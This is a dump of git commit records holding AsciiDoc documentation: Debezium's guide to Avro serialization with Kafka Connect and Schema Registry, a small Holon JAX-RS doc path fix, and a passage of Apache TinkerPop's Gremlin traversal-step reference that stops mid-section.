http:\/\/docs.confluent.io\/current\/schema-registry\/docs\/index.html[several components] that work with Avro:\n * An Avro Converter that can be used in Kafka Connect workers to map the Kafka Connect schemas into Avro schemas and to then use those Avro schemas to serialize the message keys and values into the very compact Avro binary form.\n * A Schema Registry that tracks all of the Avro schemas used in Kafka topics, and where the Avro Converter sends the generated Avro schemas. Since the Avro schemas are stored in this registry, each message need only include a tiny _schema identifier_. This makes each message even smaller, and for an I\/O bound system like Kafka this means more total throughput of the producers and consumers.\n * Avro _serdes_ (serializers and deserializers) for Kafka producers and consumers. Any Kafka consumer applications you write to consume change events can use the Avro serdes to deserialize the changes events.\n\nThese Confluent components are open source, and you can install them into any Kafka distribution and use them with Kafka Connect. However, Confluent also provides a https:\/\/www.confluent.io\/product\/confluent-open-source\/[Confluent Open Source Platform] that includes the standard Kafka distribution as well as these and other Confluent open source components, including several source and sink connectors. Some Docker images for Kafka Connect also contain the Avro converter. This includes recent link:\/docs\/docker\/[Debezium Docker images] that include the Debezium connectors, Kafka Connect, and the Avro converter.\n\n== Technical information\nA system that wants to use Avro serialization needs to complete two steps\n\n* Deploy a https:\/\/github.com\/confluentinc\/schema-registry[Schema Registry] instance\n* Use these properties to configure Apache Connect instance\n[source]\n----\nkey.converter=io.confluent.connect.avro.AvroConverter\nkey.converter.schema.registry.url=http:\/\/localhost:8081\nvalue.converter=io.confluent.connect.avro.AvroConverter\nvalue.converter.schema.registry.url=http:\/\/localhost:8081\n----\nNote: In addition to setting key\/value converters,it is *strongly recommended* to set internal key\/value converters to use JSON converters for easier analysis of stored configuration and offsets. If you would still prefer to use Avro converter it is not possible now due to a https:\/\/issues.apache.org\/jira\/browse\/KAFKA-3988[known issue].\n[source]\n----\ninternal.key.converter=org.apache.kafka.connect.json.JsonConverter\ninternal.value.converter=org.apache.kafka.connect.json.JsonConverter\n----\n\n== Debezium Docker Images\nDeploy a Schema Registry instance\n[source]\n----\ndocker run -it --rm --name schema-registry \\\n --link zookeeper \\\n -e SCHEMA_REGISTRY_KAFKASTORE_CONNECTION_URL=zookeeper:2181 \\\n -e SCHEMA_REGISTRY_HOST_NAME=schema-registry \\\n -e SCHEMA_REGISTRY_LISTENERS=http:\/\/schema-registry:8081 \\\n -p 8181:8181 confluentinc\/cp-schema-registry\n----\nRun a Kafka Connect image configured to use Avro\n[source]\n----\ndocker run -it --rm --name connect \\\n --link zookeeper:zookeeper \\\n --link kafka:kafka \\\n --link mysql:mysql \\\n --link schema-registry:schema-registry \\\n -e GROUP_ID=1 \\\n -e CONFIG_STORAGE_TOPIC=my_connect_configs \\\n -e OFFSET_STORAGE_TOPIC=my_connect_offsets \\\n -e CONNECT_KEY_CONVERTER=io.confluent.connect.avro.AvroConverter \\\n -e CONNECT_VALUE_CONVERTER=io.confluent.connect.avro.AvroConverter \\\n -e CONNECT_INTERNAL_KEY_CONVERTER=org.apache.kafka.connect.json.JsonConverter \\\n -e CONNECT_INTERNAL_VALUE_CONVERTER=org.apache.kafka.connect.json.JsonConverter \\\n -e CONNECT_KEY_CONVERTER_SCHEMA_REGISTRY_URL=http:\/\/schema-registry:8081 \\\n -e CONNECT_VALUE_CONVERTER_SCHEMA_REGISTRY_URL=http:\/\/schema-registry:8081 \\\n -p 8083:8083 debezium\/connect:0.5\n----\n\n== Confluent Open Source\nPlease refer to http:\/\/docs.confluent.io\/current\/connect\/quickstart.html#goal-of-this-quickstart[a quickstart] in Confluent's documentation.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c9a69311810a9061ba29d3c81148e86b04027df0","subject":"Fix api location","message":"Fix api location","repos":"holon-platform\/holon-jaxrs","old_file":"documentation\/src\/docs\/asciidoc\/reference\/holon-jaxrs.adoc","new_file":"documentation\/src\/docs\/asciidoc\/reference\/holon-jaxrs.adoc","new_contents":"= Holon JAX-RS integration\r\n:revnumber: {project-version}\r\n:apidir: ..\/api\/holon-jax-rs\r\n:linkattrs:\r\n:sectnums:\r\n:nofooter:\r\n:toc: left\r\n:toclevels: 3\r\n\r\nCopyright \u00a9 2016-2017\r\n\r\n_Copies of this document may be made for your own use and for distribution to others, provided that you do not charge any fee for such copies and further provided that each copy contains this Copyright Notice, whether distributed in print or electronically._\r\n\r\n== Introduction\r\n\r\nThe introduction goes here.\r\n\r\n\r\n== System requirements\r\n\r\n=== Java\r\n\r\nThe Holon Platform core module requires https:\/\/www.java.com[Java] *8* or higher.\r\n","old_contents":"= Holon JAX-RS integration\r\n:revnumber: {project-version}\r\n:apidir: ..\/..\/api\/holon-jax-rs\r\n:linkattrs:\r\n:sectnums:\r\n:nofooter:\r\n:toc: left\r\n:toclevels: 3\r\n\r\nCopyright \u00a9 2016-2017\r\n\r\n_Copies of this document may be made for your own use and for distribution to others, provided that you do not charge any fee for such copies and further provided that each copy contains this Copyright Notice, whether distributed in print or electronically._\r\n\r\n== Introduction\r\n\r\nThe introduction goes here.\r\n\r\n\r\n== System requirements\r\n\r\n=== Java\r\n\r\nThe Holon Platform core module requires https:\/\/www.java.com[Java] *8* or higher.\r\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"326963503eda3f6a16e6e7075576b6f8fa73d49c","subject":"added documentation about the new sack merge operator. I'm still not happy with this work. I need to figure out a way of saying 'no bulk'... once that is straightened out I will fix up this area of documentation.","message":"added documentation about the new sack merge operator. I'm still not happy with this work. I need to figure out a way of saying 'no bulk'... once that is straightened out I will fix up this area of documentation.\n","repos":"BrynCooke\/incubator-tinkerpop,vtslab\/incubator-tinkerpop,apache\/tinkerpop,gdelafosse\/incubator-tinkerpop,krlohnes\/tinkerpop,mike-tr-adamson\/incubator-tinkerpop,edgarRd\/incubator-tinkerpop,artem-aliev\/tinkerpop,pluradj\/incubator-tinkerpop,artem-aliev\/tinkerpop,vtslab\/incubator-tinkerpop,dalaro\/incubator-tinkerpop,artem-aliev\/tinkerpop,robertdale\/tinkerpop,gdelafosse\/incubator-tinkerpop,robertdale\/tinkerpop,newkek\/incubator-tinkerpop,pluradj\/incubator-tinkerpop,apache\/tinkerpop,edgarRd\/incubator-tinkerpop,artem-aliev\/tinkerpop,velo\/incubator-tinkerpop,newkek\/incubator-tinkerpop,jorgebay\/tinkerpop,pluradj\/incubator-tinkerpop,robertdale\/tinkerpop,jorgebay\/tinkerpop,apache\/tinkerpop,samiunn\/incubator-tinkerpop,RussellSpitzer\/incubator-tinkerpop,apache\/incubator-tinkerpop,jorgebay\/tinkerpop,apache\/incubator-tinkerpop,krlohnes\/tinkerpop,velo\/incubator-tinkerpop,mike-tr-adamson\/incubator-tinkerpop,gdelafosse\/incubator-tinkerpop,BrynCooke\/incubator-tinkerpop,RussellSpitzer\/incubator-tinkerpop,apache\/tinkerpop,n-tran\/incubator-tinkerpop,PommeVerte\/incubator-tinkerpop,PommeVerte\/incubator-tinkerpop,artem-aliev\/tinkerpop,dalaro\/incubator-tinkerpop,mike-tr-adamson\/incubator-tinkerpop,n-tran\/incubator-tinkerpop,n-tran\/incubator-tinkerpop,edgarRd\/incubator-tinkerpop,RussellSpitzer\/incubator-tinkerpop,krlohnes\/tinkerpop,apache\/tinkerpop,dalaro\/incubator-tinkerpop,newkek\/incubator-tinkerpop,robertdale\/tinkerpop,PommeVerte\/incubator-tinkerpop,samiunn\/incubator-tinkerpop,jorgebay\/tinkerpop,apache\/tinkerpop,apache\/tinkerpop,robertdale\/tinkerpop,apache\/incubator-tinkerpop,BrynCooke\/incubator-tinkerpop,vtslab\/incubator-tinkerpop,velo\/incubator-tinkerpop,krlohnes\/tinkerpop,krlohnes\/tinkerpop,samiunn\/incubator-tinkerpop","old_file":"docs\/src\/the-traversal.asciidoc","new_file":"docs\/src\/the-traversal.asciidoc","new_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\n[[traversal]]\nThe Traversal\n=============\n\nimage::gremlin-running.png[width=125]\n\nAt the most general level there is `Traversal<S,E>` which implements `Iterator<E>`, where the `S` stands for start and the `E` stands for end. A traversal is composed of four primary components:\n \n . `Step<S,E>`: an individual function applied to `S` to yield `E`. Steps are chained within a traversal.\n . `TraversalStrategy`: interceptor methods to alter the execution of the traversal (e.g. query re-writing).\n . `TraversalSideEffects`: key\/value pairs that can be used to store global information about the traversal.\n . `Traverser<T>`: the object propagating through the `Traversal` currently representing an object of type `T`. \n\nThe classic notion of a graph traversal is provided by `GraphTraversal<S,E>` which extends `Traversal<S,E>`. `GraphTraversal` provides an interpretation of the graph data in terms of vertices, edges, etc. and thus, a graph traversal link:http:\/\/en.wikipedia.org\/wiki\/Domain-specific_language[DSL].\n\nIMPORTANT: The underlying `Step` implementations provided by TinkerPop should encompass most of the functionality required by a DSL author. It is important that DSL authors leverage the provided steps as then the common optimization and decoration strategies can reason on the underlying traversal sequence. If new steps are introduced, then common traversal strategies may not function properly.\n\n[[graph-traversal-steps]]\nGraph Traversal Steps\n---------------------\n\nimage::step-types.png[width=650]\n\nA `GraphTraversal<S,E>` is spawned from a `GraphTraversalSource`. It can also be spawned anonymously (i.e. empty) via `__`. A graph traversal is composed of an ordered list of steps. All the steps provided by `GraphTraversal` inherit from the more general forms diagrammed above. A list of all the steps (and their descriptions) are provided in the TinkerPop3 link:http:\/\/www.tinkerpop.com\/javadocs\/x.y.z\/core\/org\/apache\/tinkerpop\/gremlin\/process\/graph\/GraphTraversal.html[GraphTraversal JavaDoc]. The following subsections will demonstrate the GraphTraversal steps using the <<gremlin-console,Gremlin Console>>.\n\nNOTE: To reduce the verbosity of the expression, it is good to `import static org.apache.tinkerpop.gremlin.process.traversal.dsl.graph.__.*`. This way, instead of doing `__.inE()` for an anonymous traversal, it is possible to simply write `inE()`. Be aware of language-specific reserved keywords when using anonymous traversals. For example, `in` and `as` are reserved keywords in Groovy, therefore you must use the verbose syntax `__.in()` and `__.as()` to avoid collisions.\n\n[[lambda-steps]]\nLambda Steps\n~~~~~~~~~~~~\n\nCAUTION: Lambda steps are presented for educational purposes as they represent the foundational constructs of the Gremlin language. In practice, lambda steps should be avoided and traversal verification strategies exist to disallow their use unless explicitly \"turned off.\" For more information on the problems with lambdas, please read <<a-note-on-lambdas,A Note on Lambdas>>.\n\nThere are four generic steps by which all other specific steps described later extend.\n\n[width=\"100%\",cols=\"10,12\",options=\"header\"]\n|=========================================================\n| Step| Description\n| `map(Function<Traverser<S>, E>)` | map the traverser to some object of type `E` for the next step to process.\n| `flatMap(Function<Traverser<S>, Iterator<E>>)` | map the traverser to an iterator of `E` objects that are streamed to the next step.\n| `filter(Predicate<Traverser<S>>)` | map the traverser to either true or false, where false will not pass the traverser to the next step.\n| `sideEffect(Consumer<Traverser<S>>)` | perform some operation on the traverser and pass it to the next step.\n| `branch(Function<Traverser<S>,M>)` | split the traverser to all the traversals indexed by the `M` token.\n|=========================================================\n\nThe `Traverser<S>` object provides access to:\n\n . The current traversed `S` object -- `Traverser.get()`.\n . The current path traversed by the traverser -- `Traverser.path()`.\n .. A helper shorthand to get a particular path-history object -- `Traverser.path(String) == Traverser.path().get(String)`.\n . The number of times the traverser has gone through the current loop -- `Traverser.loops()`.\n . The number of objects represented by this traverser -- `Traverser.bulk()`.\n . The local data structure associated with this traverser -- `Traverser.sack()`.\n . The side-effects associated with the traversal -- `Traverser.sideEffects()`.\n .. A helper shorthand to get a particular side-effect -- `Traverser.sideEffect(String) == Traverser.sideEffects().get(String)`.\n\nimage:map-lambda.png[width=150,float=right]\n[gremlin-groovy,modern]\n----\ng.V(1).out().values('name') <1>\ng.V(1).out().map {it.get().value('name')} <2>\n----\n\n<1> An outgoing traversal from vertex 1 to the name values of the adjacent vertices.\n<2> The same operation, but using a lambda to access the name property values.\n\nimage:filter-lambda.png[width=160,float=right]\n[gremlin-groovy,modern]\n----\ng.V().filter {it.get().label() == 'person'} <1>\ng.V().hasLabel('person') <2>\n----\n\n<1> A filter that only allows the vertex to pass if it has an age-property.\n<2> The more specific `has()`-step is implemented as a `filter()` with respective predicate.\n\n\nimage:side-effect-lambda.png[width=175,float=right]\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').sideEffect(System.out.&println) <1>\n----\n\n<1> Whatever enters `sideEffect()` is passed to the next step, but some intervening process can occur.\n\nimage:branch-lambda.png[width=180,float=right]\n[gremlin-groovy,modern]\n----\ng.V().branch(values('name')).\n option('marko', values('age')).\n option(none, values('name')) <1>\ng.V().choose(has('name','marko'),\n values('age'),\n values('name')) <2>\n----\n\n<1> If the vertex is \"marko\", get his age, else get the name of the vertex.\n<2> The more specific boolean-based `choose()`-step is implemented as a `branch()`.\n\n[[addedge-step]]\nAddEdge Step\n~~~~~~~~~~~~\n\nlink:http:\/\/en.wikipedia.org\/wiki\/Automated_reasoning[Reasoning] is the process of making explicit what is implicit in the data. What is explicit in a graph are the objects of the graph -- i.e. vertices and edges. What is implicit in the graph is the traversal. In other words, traversals expose meaning where the meaning is determined by the traversal definition. For example, take the concept of a \"co-developer.\" Two people are co-developers if they have worked on the same project together. This concept can be represented as a traversal and thus, the concept of \"co-developers\" can be derived. Moreover, what was once implicit can be made explicit via the `addE()`-step (*map*\/*sideEffect*).\n\nimage::addedge-step.png[width=450]\n\n[gremlin-groovy,modern]\n----\ng.V(1).as('a').out('created').in('created').where(neq('a')).\n addE('co-developer').from('a').property('year',2009) <1>\ng.V(3,4,5).aggregate('x').has('name','josh').as('a').\n select('x').unfold().hasLabel('software').addE('createdBy').to('a') <2>\ng.V().as('a').out('created').addE('createdBy').to('a').property('acl','public') <3>\ng.V(1).as('a').out('knows').\n addE('livesNear').from('a').property('year',2009).\n inV().inE('livesNear').values('year') <4>\ng.V().match(\n __.as('a').out('knows').as('b'),\n __.as('a').out('created').as('c'),\n __.as('b').out('created').as('c')).\n addE('friendlyCollaborator').from('a').to('b').\n property(id,13).property('project',select('c').values('name')) <5>\ng.E(13).valueMap()\n----\n\n<1> Add a co-developer edge with a year-property between marko and his collaborators.\n<2> Add incoming createdBy edges from the josh-vertex to the lop- and ripple-vertices.\n<3> Add an inverse createdBy edge for all created edges.\n<4> The newly created edge is a traversable object.\n<5> Two arbitrary bindings in a traversal can be joined `from()`->`to()`, where `id` can be provided for graphs that supports user provided ids.\n\n[[addvertex-step]]\nAddVertex Step\n~~~~~~~~~~~~~~\n\nThe `addV()`-step is used to add vertices to the graph (*map*\/*sideEffect*). For every incoming object, a vertex is created. Moreover, `GraphTraversalSource` maintains an `addV()` method.\n\n[gremlin-groovy,modern]\n----\ng.addV('person').property('name','stephen')\ng.V().values('name')\ng.V().outE('knows').addV().property('name','nothing')\ng.V().has('name','nothing')\ng.V().has('name','nothing').bothE()\n----\n\n[[addproperty-step]]\nAddProperty Step\n~~~~~~~~~~~~~~~~\n\nThe `property()`-step is used to add properties to the elements of the graph (*sideEffect*). Unlike `addV()` and `addE()`, `property()` is a full sideEffect step in that it does not return the property it created, but the element that streamed into it. Moreover, if `property()` follows an `addV()` or `addE()`, then it is \"folded\" into the previous step to enable vertex and edge creation with all its properties in one creation operation.\n\n[gremlin-groovy,modern]\n----\ng.V(1).property('country','usa')\ng.V(1).property('city','santa fe').property('state','new mexico').valueMap()\ng.V(1).property(list,'age',35) <1>\ng.V(1).valueMap()\ng.V(1).property('friendWeight',outE('knows').values('weight').sum(),'acl','private') <2>\ng.V(1).properties('friendWeight').valueMap() <3>\n----\n\n<1> For vertices, a cardinality can be provided for <<vertex properties,vertex-properties>>.\n<2> It is possible to select the property value (as well as key) via a traversal.\n<3> For vertices, the `property()`-step can add meta-properties.\n\n\n[[aggregate-step]]\nAggregate Step\n~~~~~~~~~~~~~~\n\nimage::aggregate-step.png[width=800]\n\nThe `aggregate()`-step (*sideEffect*) is used to aggregate all the objects at a particular point of traversal into a Collection. The step uses link:http:\/\/en.wikipedia.org\/wiki\/Eager_evaluation[eager evaluation] in that no objects continue on until all previous objects have been fully aggregated (as opposed to <<store-step,`store()`>> which link:http:\/\/en.wikipedia.org\/wiki\/Lazy_evaluation[lazily] fills a collection). The eager evaluation nature is crucial in situations where everything at a particular point is required for future computation. An example is provided below.\n\n[gremlin-groovy,modern]\n----\ng.V(1).out('created') <1>\ng.V(1).out('created').aggregate('x') <2>\ng.V(1).out('created').aggregate('x').in('created') <3>\ng.V(1).out('created').aggregate('x').in('created').out('created') <4>\ng.V(1).out('created').aggregate('x').in('created').out('created').\n where(without('x')).values('name') <5>\n----\n\n<1> What has marko created?\n<2> Aggregate all his creations.\n<3> Who are marko's collaborators?\n<4> What have marko's collaborators created?\n<5> What have marko's collaborators created that he hasn't created?\n\nIn link:http:\/\/en.wikipedia.org\/wiki\/Recommender_system[recommendation systems], the above pattern is used:\n \n \"What has userA liked? Who else has liked those things? What have they liked that userA hasn't already liked?\"\n\nFinally, `aggregate()`-step can be modulated via `by()`-projection.\n\n[gremlin-groovy,modern]\n----\ng.V().out('knows').aggregate('x').cap('x')\ng.V().out('knows').aggregate('x').by('name').cap('x')\n----\n\n[[and-step]]\nAnd Step\n~~~~~~~~\n\nThe `and()`-step ensures that all provided traversals yield a result (*filter*). Please see <<or-step,`or()`>> for or-semantics.\n\n[gremlin-groovy,modern]\n----\ng.V().and(\n outE('knows'),\n values('age').is(lt(30))).\n values('name')\n----\n\nThe `and()`-step can take an arbitrary number of traversals. All traversals must produce at least one output for the original traverser to pass to the next step.\n\nAn link:http:\/\/en.wikipedia.org\/wiki\/Infix_notation[infix notation] can be used as well. Though, with infix notation, only two traversals can be and'd together.\n\n[gremlin-groovy,modern]\n----\ng.V().where(outE('created').and().outE('knows')).values('name')\n----\n\n[[as-step]]\nAs Step\n~~~~~~~\n\nThe `as()`-step is not a real step, but a \"step modulator\" similar to <<by-step,`by()`>> and <<option-step,`option()`>>. With `as()`, it is possible to provide a label to the step that can later be accessed by steps and data structures that make use of such labels -- e.g., <<select-step,`select()`>>, <<match-step,`match()`>>, and path.\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').out('created').as('b').select('a','b') <1>\ng.V().as('a').out('created').as('b').select('a','b').by('name') <2>\n----\n\n<1> Select the objects labeled \"a\" and \"b\" from the path.\n<2> Select the objects labeled \"a\" and \"b\" from the path and, for each object, project its name value.\n\nA step can have any number of labels associated with it. This is useful for referencing the same step multiple times in a future step.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('software').as('a','b','c').\n select('a','b','c').\n by('name').\n by('lang').\n by(__.in('created').values('name').fold())\n----\n\n[[barrier-step]]\nBarrier Step\n~~~~~~~~~~~~\n\nThe `barrier()`-step (*barrier*) turns the the lazy traversal pipeline into a bulk-synchronous pipeline. This step is useful in the following situations:\n\n * When everything prior to `barrier()` needs to be executed before moving onto the steps after the `barrier()` (i.e. ordering).\n * When \"stalling\" the traversal may lead to a \"bulking optimization\" in traversals that repeatedly touch many of the same elements (i.e. optimizing).\n\n[gremlin-groovy,modern]\n----\ng.V().sideEffect{println \"first: ${it}\"}.sideEffect{println \"second: ${it}\"}.iterate()\ng.V().sideEffect{println \"first: ${it}\"}.barrier().sideEffect{println \"second: ${it}\"}.iterate()\n----\n\nThe theory behind a \"bulking optimization\" is simple. If there are one million traversers at vertex 1, then there is no need to calculate one million `both()`-computations. Instead, represent those one million traversers as a single traverser with a `Traverser.bulk()` equal to one million and execute `both()` once. A bulking optimization example is made more salient on a larger graph. Therefore, the example below leverages the <<grateful-dead,Grateful Dead graph>>.\n\n[gremlin-groovy]\n----\ngraph = TinkerGraph.open()\ngraph.io(graphml()).readGraph('data\/grateful-dead.xml')\ng = graph.traversal(standard())\nclockWithResult(1){g.V().both().both().both().count().next()} <1>\nclockWithResult(1){g.V().repeat(both()).times(3).count().next()} <2>\nclockWithResult(1){g.V().both().barrier().both().barrier().both().barrier().count().next()} <3>\n----\n\n<1> A non-bulking traversal where each traverser is processed.\n<2> Each traverser entering `repeat()` has its recursion bulked.\n<3> A bulking traversal where implicit traversers are not processed.\n\nIf `barrier()` is provided an integer argument, then the barrier will only hold `n`-number of unique traversers in its barrier before draining the aggregated traversers to the next step. This is useful in the aforementioned bulking optimization scenario, but reduces the risk of an out-of-memory exception.\n\nThe non-default `LazyBarrierStrategy` inserts `barrier()`-steps in a traversal where appropriate in order to gain the \"bulking optimization.\"\n\n[gremlin-groovy]\n----\ngraph = TinkerGraph.open()\ngraph.io(graphml()).readGraph('data\/grateful-dead.xml')\ng = graph.traversal(GraphTraversalSource.build().with(LazyBarrierStrategy.instance()).engine(StandardTraversalEngine.build()))\nclockWithResult(1){g.V().both().both().both().count().next()}\ng.V().both().both().both().count().iterate().toString() <1>\n----\n\n<1> With `LazyBarrierStrategy` activated, `barrier()` steps are automatically inserted where appropriate.\n\n[[by-step]]\nBy Step\n~~~~~~~\n\nThe `by()`-step is not an actual step, but instead is a \"step-modulator\" similar to <<as-step,`as()`>> and <<option-step,`option()`>>. If a step is able to accept traversals, functions, comparators, etc. then `by()` is the means by which they are added. The general pattern is `step().by()...by()`. Some steps can only accept one `by()` while others can take an arbitrary amount.\n\n[gremlin-groovy,modern]\n----\ng.V().group().by(bothE().count()) <1>\ng.V().group().by(bothE().count()).by('name') <2>\ng.V().group().by(bothE().count()).by('name').by(count(local)) <3>\n----\n\n<1> `by(outE().count())` will group the elements by their edge count (*traversal*).\n<2> `by('name')` will process the grouped elements by their name (*element property projection*).\n<3> `by(count(local))` will count the number of elements in each group (*traversal*).\n\n[cap-step]]\nCap Step\n~~~~~~~~\n\nThe `cap()`-step (*barrier*) iterates the traversal up to itself and emits the sideEffect referenced by the provided key. If multiple keys are provided, then a `Map<String,Object>` of sideEffects is emitted.\n\n[gremlin-groovy,modern]\n----\ng.V().groupCount('a').by(label).cap('a') <1>\ng.V().groupCount('a').by(label).groupCount('b').by(outE().count()).cap('a','b') <2>\n----\n\n<1> Group and count verticies by their label. Emit the side effect labeled 'a', which is the group count by label.\n<2> Same as statement 1, but also emit the side effect labeled 'b' which groups vertices by the number of out edges.\n\n[[coalesce-step]]\nCoalesce Step\n~~~~~~~~~~~~~\n\nThe `coalesce()`-step evaluates the provided traversals in order and returns the first traversal that emits at least one element.\n\n[gremlin-groovy,modern]\n----\ng.V(1).coalesce(outE('knows'), outE('created')).inV().path().by('name').by(label)\ng.V(1).coalesce(outE('created'), outE('knows')).inV().path().by('name').by(label)\ng.V(1).next().property('nickname', 'okram')\ng.V().hasLabel('person').coalesce(values('nickname'), values('name'))\n----\n\n[[count-step]]\nCount Step\n~~~~~~~~~~\n\nimage::count-step.png[width=195]\n\nThe `count()`-step (*map*) counts the total number of represented traversers in the streams (i.e. the bulk count).\n\n[gremlin-groovy,modern]\n----\ng.V().count()\ng.V().hasLabel('person').count()\ng.V().hasLabel('person').outE('created').count().path() <1>\ng.V().hasLabel('person').outE('created').count().map {it.get() * 10}.path() <2>\n----\n\n<1> `count()`-step is a <<a-note-on-barrier-steps,reducing barrier step>> meaning that all of the previous traversers are folded into a new traverser.\n<2> The path of the traverser emanating from `count()` starts at `count()`.\n\nIMPORTANT: `count(local)` counts the current, local object (not the objects in the traversal stream). This works for `Collection`- and `Map`-type objects. For any other object, a count of 1 is returned.\n\n[[choose-step]]\nChoose Step\n~~~~~~~~~~~\n\nimage::choose-step.png[width=700]\n\nThe `choose()`-step (*branch*) routes the current traverser to a particular traversal branch option. With `choose()`, it is possible to implement if\/else-based semantics as well as more complicated selections.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').\n choose(values('age').is(lte(30)),\n __.in(),\n __.out()).values('name') <1>\ng.V().hasLabel('person').\n choose(values('age')).\n option(27, __.in()).\n option(32, __.out()).values('name') <2>\n----\n\n<1> If the traversal yields an element, then do `in`, else do `out` (i.e. true\/false-based option selection).\n<2> Use the result of the traversal as a key to the map of traversal options (i.e. value-based option selection).\n\nHowever, note that `choose()` can have an arbitrary number of options and moreover, can take an anonymous traversal as its choice function.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').\n choose(values('name')).\n option('marko', values('age')).\n option('josh', values('name')).\n option('vadas', valueMap()).\n option('peter', label())\n----\n\nThe `choose()`-step can leverage the `Pick.none` option match. For anything that does not match a specified option, the `none`-option is taken.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').\n choose(values('name')).\n option('marko', values('age')).\n option(none, values('name'))\n----\n\n[[coin-step]]\nCoin Step\n~~~~~~~~~\n\nTo randomly filter out a traverser, use the `coin()`-step (*filter*). The provided double argument biases the \"coin toss.\"\n\n[gremlin-groovy,modern]\n----\ng.V().coin(0.5)\ng.V().coin(0.0)\ng.V().coin(1.0)\n----\n\n[[constant-step]]\nConstant Step\n~~~~~~~~~~~~~\n\nTo specify a constant value for a traverser, use the `constant()`-step (*map*). This is often useful with conditional steps like <<choose-step,`choose()`-step>> or <<coalesce-step,`coalesce()`-step>>.\n\n[gremlin-groovy,modern]\n----\ng.V().choose(__.hasLabel('person'),\n __.values('name'),\n __.constant('inhuman')) <1>\ng.V().coalesce(\n __.hasLabel('person').values('name'),\n __.constant('inhuman')) <2>\n----\n\n<1> Show the names of people, but show \"inhuman\" for other vertices.\n<2> Same as statement 1 (unless there is a person vertex with no name).\n\n[[cyclicpath-step]]\nCyclicPath Step\n~~~~~~~~~~~~~~~\n\nimage::cyclicpath-step.png[width=400]\n\nEach traverser maintains its history through the traversal over the graph -- i.e. its <<path-data-structure,path>>. If it is important that the traverser repeat its course, then `cyclic()`-path should be used (*filter*). The step analyzes the path of the traverser thus far and if there are any repeats, the traverser is filtered out over the traversal computation. If non-cyclic behavior is desired, see <<simplepath-step,`simplePath()`>>.\n\n[gremlin-groovy,modern]\n----\ng.V(1).both().both()\ng.V(1).both().both().cyclicPath()\ng.V(1).both().both().cyclicPath().path()\n----\n\n[[dedup-step]]\nDedup Step\n~~~~~~~~~~\n\nWith `dedup()`-step (*filter*), repeatedly seen objects are removed from the traversal stream. Note that if a traverser's bulk is greater than 1, then it is set to 1 before being emitted.\n\n[gremlin-groovy,modern]\n----\ng.V().values('lang')\ng.V().values('lang').dedup()\ng.V(1).repeat(bothE('created').dedup().otherV()).emit().path() <1>\n----\n\n<1> Traverse all `created` edges, but don't touch any edge twice.\n\nIf a by-step modulation is provided to `dedup()`, then the object is processed accordingly prior to determining if it has been seen or not.\n\n[gremlin-groovy,modern]\n----\ng.V().valueMap(true, 'name')\ng.V().dedup().by(label).values('name')\n----\n\nFinally, if `dedup()` is provided an array of strings, then it will ensure that the de-duplication is not with respect to the current traverser object, but to the path history of the traverser.\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').out('created').as('b').in('created').as('c').select('a','b','c')\ng.V().as('a').out('created').as('b').in('created').as('c').dedup('a','b').select('a','b','c') <1>\n----\n\n<1> If the current `a` and `b` combination has been seen previously, then filter the traverser.\n\n[[drop-step]]\nDrop Step\n~~~~~~~~~\n\nThe `drop()`-step (*filter*\/*sideEffect*) is used to remove element and properties from the graph (i.e. remove). It is a filter step because the traversal yields no outgoing objects.\n\n[gremlin-groovy,modern]\n----\ng.V().outE().drop()\ng.E()\ng.V().properties('name').drop()\ng.V().valueMap()\ng.V().drop()\ng.V()\n----\n\n[[fold-step]]\nFold Step\n~~~~~~~~~\n\nThere are situations when the traversal stream needs a \"barrier\" to aggregate all the objects and emit a computation that is a function of the aggregate. The `fold()`-step (*map*) is one particular instance of this. Please see <<unfold-step,`unfold()`>>-step for the inverse functionality.\n\n[gremlin-groovy,modern]\n----\ng.V(1).out('knows').values('name')\ng.V(1).out('knows').values('name').fold() <1>\ng.V(1).out('knows').values('name').fold().next().getClass() <2>\ng.V(1).out('knows').values('name').fold(0) {a,b -> a + b.length()} <3>\ng.V().values('age').fold(0) {a,b -> a + b} <4>\ng.V().values('age').fold(0, sum) <5>\ng.V().values('age').sum() <6>\n----\n\n<1> A parameterless `fold()` will aggregate all the objects into a list and then emit the list.\n<2> A verification of the type of list returned.\n<3> `fold()` can be provided two arguments -- a seed value and a reduce bi-function (\"vadas\" is 5 characters + \"josh\" with 4 characters).\n<4> What is the total age of the people in the graph?\n<5> The same as before, but using a built-in bi-function.\n<6> The same as before, but using the <<sum-step,`sum()`-step>>.\n\n[[group-step]]\nGroup Step\n~~~~~~~~~~\n\nAs traversers propagate across a graph as defined by a traversal, sideEffect computations are sometimes required. That is, the actual path taken or the current location of a traverser is not the ultimate output of the computation, but some other representation of the traversal. The `group()`-step (*sideEffect*) is one such sideEffect that organizes the objects according to some function of the object. Then, if required, that organization (a list) is reduced. An example is provided below.\n\n[gremlin-groovy,modern]\n----\ng.V().group().by(label) <1>\ng.V().group().by(label).by('name') <2>\ng.V().group().by(label).by('name').by(count(local)) <3>\n----\n\n<1> Group the vertices by their label.\n<2> For each vertex in the group, get their name.\n<3> For each grouping, what is its size?\n\nThe three projection parameters available to `group()` via `by()` are:\n\n. Key-projection: What feature of the object to group on (a function that yields the map key)?\n. Value-projection: What feature of the group to store in the key-list?\n. Reduce-projection: What feature of the key-list to ultimately return?\n\n[[groupcount-step]]\nGroupCount Step\n~~~~~~~~~~~~~~~\n\nWhen it is important to know how many times a particular object has been at a particular part of a traversal, `groupCount()`-step (*sideEffect*) is used.\n\n \"What is the distribution of ages in the 